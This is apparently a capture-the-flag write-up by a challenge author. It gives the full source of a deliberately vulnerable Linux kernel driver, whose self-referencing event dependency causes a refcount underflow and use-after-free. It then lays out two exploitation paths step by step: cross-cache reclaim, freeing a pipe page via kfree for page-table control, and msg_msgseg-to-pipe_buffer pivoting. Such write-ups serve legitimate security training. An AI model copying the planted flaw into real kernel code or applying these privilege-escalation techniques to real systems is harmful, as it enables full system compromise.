Last month, Jacob asked me to create a CTF challenge for the Summer Pwnables event. I went with a kernel pwnable since my goal was to teach students some more advanced Linux kernel exploitation techniques - something that wouldn’t get solved in a day (and hopefully not by AI either).

After building both the challenge and solution, I figured students should be able to crack it within 3-7 days. Turns out I was right about the timeline, but only one person actually solved it. Jun Rong Lam, he is the first solver by solving this challenge in a week. The next week Lucas Tan Yi Je solved it. In third week, Elijah Chia solved this challenge, so 3 weeks in total. I really amaze by these students skills and persistence.

Before I explain the solution, you can get the challenge here. If you want hints, you can see this and this.

Challenge #002: Walkthrough

Now let me introduce you the challenge. Like usual kernel pwnables, we give them vulnerable kernel driver.

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/refcount.h>
#include <linux/cdev.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/mutex.h>

#define DEVICE_NAME "paradox_engine"

MODULE_LICENSE("GPL");


struct temporal_event {
        u64 event_id;
        refcount_t causal_weight;
        struct temporal_event *causal_dependency;
        char description[64];
        struct list_head timeline_node;
        struct timeline *parent_timeline;
};

struct timeline {
        u64 timeline_id;
        atomic64_t next_event_id;
        struct list_head events_head;
        struct temporal_event *caused_by_event;
        struct list_head session_node;
};

struct paradox_session_data {
        struct mutex lock;
        struct list_head all_timelines;
        atomic64_t next_timeline_id;
};

static struct kmem_cache *temporal_event_cache;

static void event_erase_from_reality(struct temporal_event *event);

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
        //      printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
        kfree(event);
}

static struct temporal_event* find_event_in_timeline(struct timeline *tl, u64 event_id) {
        struct temporal_event *ev;
        if (!tl) return NULL;
        list_for_each_entry(ev, &tl->events_head, timeline_node) {
                if (ev->event_id == event_id) return ev;
        }
        return NULL;
}

#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

struct paradox_timeline_req {
        u64 cause_timeline_id, cause_event_id;
        u64 new_timeline_id;
};
struct paradox_event_req {
        u64 target_timeline_id;
        u64 cause_event_id;
        char description[64];
        u64 new_event_id;
};

static int paradox_engine_open(struct inode *inode, struct file *filp) {
        struct paradox_session_data *session = kzalloc(sizeof(*session), GFP_KERNEL);
        if (!session) return -ENOMEM;

        mutex_init(&session->lock);

        INIT_LIST_HEAD(&session->all_timelines);
        atomic64_set(&session->next_timeline_id, 0);

        struct timeline *primordial_tl = kzalloc(sizeof(*primordial_tl), GFP_KERNEL);
        if (!primordial_tl) { kfree(session); return -ENOMEM; }
        primordial_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
        atomic64_set(&primordial_tl->next_event_id, 0);
        INIT_LIST_HEAD(&primordial_tl->events_head);
        list_add_tail(&primordial_tl->session_node, &session->all_timelines);

        struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
        if (!first_cause) { kfree(primordial_tl); kfree(session); return -ENOMEM; }
        first_cause->event_id = atomic64_fetch_add(1, &primordial_tl->next_event_id);
        refcount_set(&first_cause->causal_weight, 1);
        strcpy(first_cause->description, "The First Cause");
        first_cause->parent_timeline = primordial_tl;
        list_add_tail(&first_cause->timeline_node, &primordial_tl->events_head);

        filp->private_data = session;
        //printk(KERN_INFO "paradox_engine: New private universe created with Local Causality law.\n");
        return 0;
}

static int paradox_engine_release(struct inode *inode, struct file *filp) {
        struct paradox_session_data *session = filp->private_data;
        struct timeline *tl, *tmp_tl;
        struct temporal_event *event, *tmp_event;
        //printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
        list_for_each_entry(tl, &session->all_timelines, session_node) {
                list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
                        struct temporal_event *cause = event->causal_dependency;
                        list_del(&event->timeline_node);
                        while (cause) {
                                struct temporal_event *next_in_chain = cause->causal_dependency;
                                event_put(cause);
                                cause = next_in_chain;
                        }
                        event->causal_dependency = NULL;
                        event_put(event);
                }
        }
        //printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
        list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
                list_del(&tl->session_node);
                if (tl->caused_by_event) event_put(tl->caused_by_event);
                kfree(tl);
        }
        kfree(session);
        return 0;
}

static long paradox_engine_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
        struct paradox_session_data *session = filp->private_data;
        struct timeline *target_tl = NULL, *tmp_tl;
        long ret = 0;

        mutex_lock(&session->lock);

        switch (cmd) {
                case PARADOX_CREATE_TIMELINE:
                        {
                                struct paradox_timeline_req req;
                                if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
                                struct temporal_event *cause_event = NULL;
                                list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
                                        if(tmp_tl->timeline_id == req.cause_timeline_id) {
                                                cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
                                                if(cause_event) break;
                                        }
                                }
                                if (!cause_event) { ret = -EINVAL; break; }
                                struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
                                if (!new_tl) { ret = -ENOMEM; break; }
                                new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
                                atomic64_set(&new_tl->next_event_id, 0);
                                INIT_LIST_HEAD(&new_tl->events_head);
                                new_tl->caused_by_event = cause_event;
                                event_get(cause_event);
                                list_add_tail(&new_tl->session_node, &session->all_timelines);
                                req.new_timeline_id = new_tl->timeline_id;
                                if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
                                break;
                        }

                case PARADOX_CREATE_EVENT:
                        {
                                struct paradox_event_req req;
                                if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
                                list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
                                        if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
                                }
                                if (!target_tl) { ret = -EINVAL; break; }
                                struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
                                if (!event) { ret = -ENOMEM; break; }
                                event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
                                refcount_set(&event->causal_weight, 1);
                                strncpy(event->description, req.description, sizeof(event->description) - 1);
                                event->parent_timeline = target_tl;
                                list_add_tail(&event->timeline_node, &target_tl->events_head);
                                if (req.cause_event_id != 0) {
                                        struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
                                        if (cause_event) {
                                                event->causal_dependency = cause_event;
                                                event_get(cause_event);
                                        }
                                }
                                req.new_event_id = event->event_id;
                                if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
                                break;
                        }
                default:
                        ret = -EINVAL;
        }

        mutex_unlock(&session->lock);
        return ret;
}

static const struct file_operations fops = {
        .owner = THIS_MODULE,
        .open = paradox_engine_open,
        .release = paradox_engine_release,
        .unlocked_ioctl = paradox_engine_ioctl,
};

static struct miscdevice dev;

static int dev_init(void) {
        dev.minor = MISC_DYNAMIC_MINOR;
        dev.name = DEVICE_NAME;
        dev.fops = &fops;
        dev.mode = 0644;
        temporal_event_cache = kmem_cache_create("temporal_event_cache",
                        sizeof(struct temporal_event),
                        0, SLAB_PANIC, NULL);
        if (!temporal_event_cache) {
                printk(KERN_ERR "paradox_engine: Failed to create slab cache.\n");
                return -ENOMEM;
        }

        if (misc_register(&dev)) {
                return -1;
        }


        return 0;
}

static void dev_cleanup(void) {
        misc_deregister(&dev);
}


module_init(dev_init);
module_exit(dev_cleanup);

We register kernel device that we can interact by opening “/dev/paradox_engine”. We also have important data structure, called timeline and temporal_event. When we open the kernel driver, it will allocate paradox_session_data and store it in private_data. paradox_session_data will held all the timeline in a linked list. timeline will held all of it’s temporal_event by linked list also.

When we open the driver, it will paradox_engine_open and allocate initial timeline (first timeline) and in first timeline it will allocate the first event. There’s also ioctl interface that we can interact, we can create another timeline using PARADOX_CREATE_TIMELINE and create another event using PARADOX_CREATE_EVENT.

The bug was not really hard to spot. In PARADOX_CREATE_EVENT we can specify which event that caused it by specifying cause_event_id. Code will search through timeline event linked list to get caused event. The bug was, the event that we want just create it will inserted to linked list first, and if we have cause_event_id had the same ID with the event that we just inserted in it will lead to an infinite dependency loop.

list_add_tail(&event->timeline_node, &target_tl->events_head); // [1]
if (req.cause_event_id != 0) {
    struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id); // [2] find event after add our event to linked list
    if (cause_event) {
        event->causal_dependency = cause_event;
        event_get(cause_event);
    }
}
req.new_event_id = event->event_id;

When we release the file, it will call paradox_engine_release, it will release all of its timelines and all of its events. If we managed to trigger the bug, this code will run in an infinite loop, because the causal_dependency point to itself.

struct temporal_event *cause = event->causal_dependency;
list_del(&event->timeline_node);
while (cause) {
    struct temporal_event *next_in_chain = cause->causal_dependency;
    event_put(cause);
    cause = next_in_chain;
}

event_put will keep decrement the refcount until zero and free the event using kfree, but the CPU will still stuck on this infinite loop. After the refcount is zero and free the event, the refcount decrement will not bring back the refcount to 0 again, instead refcount always saturated by 0xC0000000 because the value now is will always below 1.

#define REFCOUNT_SATURATED	(INT_MIN / 2)
static inline void __refcount_dec(refcount_t *r, int *oldp)
{
	int old = atomic_fetch_sub_release(1, &r->refs);

	if (oldp)
		*oldp = old;

	if (unlikely(old <= 1))
		refcount_warn_saturate(r, REFCOUNT_DEC_LEAK);
}
void refcount_warn_saturate(refcount_t *r, enum refcount_saturation_type t)
{
	refcount_set(r, REFCOUNT_SATURATED);
    ...
}

Author Solution

Participant will notice, the object was allocated on it’s own dedicated slub cache (temporal_event_cache). So we need to do cross cache. There’s so many resource how to do this. Basically, we just need make a slab page return to the buddy allocator, and reclaim the slab page with another object by spraying. You can read more from this talk or here about cross-cache. For kernel exploit technique, there’s a ton of resources that you can learn from Google’s KernelCTF repo.

In this challenge, we need one more constraint for cross-cache, the slab page must return to our cpu’s per-cpu page free list, not the CPU that will stuck on infinite loop, it will impossible to reclaim if the page that freed inserted to stuck CPU’s pcp (per-cpu page) freelist.

What I did for cross cache is I hold one event before and after I alloc victim event, after infinite loop happens in CPU0, my other thread in CPU1 I release event before and after so the whole slub page will enter CPU1 pcp free list. This is roughy steps of what I do:

  1. alloc N set of event (our victim event included in this)
  2. let say victim was on M-th event from N those allocated event
  3. allocate 0x400 event (outside of N set of event)
  4. free 0x100 event from every odd event to CPU0 (fill cpu partial list)
  5. free 0x100 event from every odd event to CPU1 (fill cpu partial list)
  6. in CPU1: free all N event, except (M-1)th, M, (M+1)th event
  7. in CPU0: trigger the bug using M-th event, M-th event freed
  8. in CPU1: Free (M-1)th and (M+1)th event, its slub page will empty and put to CPU1 pcp freelist.

After we succsefully reclaim, we can null-ed out causal_dependency so infinite loop will released.

Participant will also notice the size of temporal_event is 0x70, with cross cache to another object it’s hard to find the same aligned object. So this is how this challenge turns out to be harder, but it’s should be solvable with common or known technique.

Intended solution #01

After I create the challenge, I quickly craft the solution, instead using common trick that might need more time to build, I use this one trick to make double free turns into page use after free without caring the chunk or address alignment. And also this is how Hint #2 is about:

Hint #2: 🤫 Here’s a fun thought experiment: What happens when you take a peek at kfree and then… oops… “accidentally” free some non-slab memory? Might just be the plot twist your non-aligned kfree issue has been waiting for!

It turns out, if you kfree then non slub managed memory area, it will just free its page:

/**
 * kfree - free previously allocated memory
 * @object: pointer returned by kmalloc() or kmem_cache_alloc()
 *
 * If @object is NULL, no operation is performed.
 */
void kfree(const void *object)
{
	struct folio *folio;
	struct slab *slab;
	struct kmem_cache *s;
	void *x = (void *)object;

	trace_kfree(_RET_IP_, object);

	if (unlikely(ZERO_OR_NULL_PTR(object)))
		return;

	folio = virt_to_folio(object);
	if (unlikely(!folio_test_slab(folio))) {
		free_large_kmalloc(folio, (void *)object);
		return;
	}

	slab = folio_slab(folio);
	s = slab->slab_cache;
	slab_free(s, slab, x, _RET_IP_);
}
EXPORT_SYMBOL(kfree);

static void free_large_kmalloc(struct folio *folio, void *object)
{
	unsigned int order = folio_order(folio);

	if (WARN_ON_ONCE(order == 0))
		pr_warn_once("object pointer: 0x%p\n", object);

	kmemleak_free(object);
	kasan_kfree_large(object);
	kmsan_kfree_large(object);

	lruvec_stat_mod_folio(folio, NR_SLAB_UNRECLAIMABLE_B,
			      -(PAGE_SIZE << order));
	folio_put(folio);
}

Without caring any alignment or any address, if the address not backed by slab it will pass the page folio to free_large_kmalloc and it will put the page by calling folio_put.

So my plan is spray the page backed pipe (which is order 0), and craft such refcount = 1, and it will call event_put again which will free our pipe page. Pipe page (different with pipe_buffer) is also known to be a kernel exploit technique if you read this or this, or you can take a look at the code here.

So we have pipe page freed by using kfree -> page free primitive, but still held by pipe fd. Next, for quick approach i just try to reclaim the freed page pipe with pagetable. We can still write the page table by writing the pipe, and so we have physical read/write anywhere using this.

Intended solution #02

A week almost passed, we already release Hint #1 and #2 on third day, and thinking if we need publish another hint. This time i thinking maybe my first inteded solution might be too uncommon (or challenge too hard). Turns out, Jun Rong solved the challenge before we post the third hint, like i was expecting before.

Although the way victim chunk placed on 0x70 aligned address it looks hard to solve, but i’m sure and confidence enough it possible to solve using more common technique, such as msg_msg or pipe_buffer, or it might be not solvable using common technique?.

Then I quickly verify to made this solution only based on msg_msg and pipe_buffer, turns out it works (although only had around 50% reliable, but still good).

The idea is we just keep trying until our victim event is same aligned with our target kmalloc cache. For example, if we lucky, we can have same aligned with kmalloc-128, 192, 256. You can calculate by yourself it will be around 10% it will be same align. On top of that, I have another idea to make it to run multiple times until it’s correct aligned without crashing the kernel, and make the reliability of this solution is around 50%.

We can look again how the code releases all events:

        list_for_each_entry(tl, &session->all_timelines, session_node) {
                list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
                        struct temporal_event *cause = event->causal_dependency;
                        list_del(&event->timeline_node);
                        while (cause) {
                                struct temporal_event *next_in_chain = cause->causal_dependency;
                                event_put(cause);
                                cause = next_in_chain;
                        }
                        event->causal_dependency = NULL;
                        event_put(event);
                }
        }

This is roughly steps of the idea:

  1. insert first event, caused_by to itself (victim_event)
  2. insert second event, caused_by to itself (make sure it different slab page with first event)
  3. insert third event, make it caused_by to the first event
  4. close fd, it will infinite loop when free the first event.
  5. reclaim with msg_msgseg, let say kmalloc-192, we don’t need to craft anything, just null all the content
  6. infinite loop will break
  7. another infinite loop from the second event is running
  8. in another CPU, i will observe my msg_msgseg that successfully replaced victim event, the content should not null on some offset (because of refcount_dec will modify the content)
  9. so I know the offset of refcount, and I will know the object location is the same as msg_msgseg or no.
  10. if not same, I release second infinite loop (of course by reclaim second event with null again)
  11. then it will release third event, although third event will put the caused event (which is victim event), it will not doing anything (event_put is harmless if refcount is not 1)
  12. goto the beginning (run again)
  13. if same, I replace our msg_msgseg (by delete and alloc again) and craft temporal_event to make it have refcount = 1
  14. I release the second event infinite loop
  15. then it will released third event, the causal_dependency still point to victim event, and now have refcount=1, then it will try to kfree victim event which actually still hold by our msg_msg

After these steps, we have use-after-free on msg_msgseg. It looks too complicated, but given creativity + time, participant should find similar idea. After get UAF on msg_msgseg, it means we get an UAF on generic cache. In my case i pivot UAF on msg_msgseg to get UAF on famous pipe_buffer which the same cache as msg_msgseg, you can get kernel arbitrary read write with this, or directly to do overwrite kernel function pointer and do ROP.

As a side note, this solution still get 50% reliability because sometime we can have such condition where event->causal_dependency stored in the same place with free list value when we reclaim with another object, because new slab page allocated and they will reinitialize free list value across the slab page, thus it can crash when kernel deref event->causal_dependency.

Close words

Although I realize that i made a very hard challenge than most student could imagine or could do, but I glad three students managed to solved given creativity and persistency. Those three students, managed to solved it different way from intended solution, this is very normal for kernel CTF challange. One of them using refcount_dec primitive to edit pgtable, another using partial overwrite to pivot page use after free to higher order, which is really cool to see their creativity. This is exactly what we need when we face hard exploitation problem in CTF even in real-world.

Writeup by students

References

  1. https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf
  2. https://kaligulaarmblessed.github.io/post/cross-cache-for-lazy-people/
  3. https://hoefler.dev/articles/vsock.html
  4. https://www.interruptlabs.co.uk/articles/pipe-buffer
  5. https://elixir.bootlin.com/linux/v6.12.46/source/fs/pipe.c#L513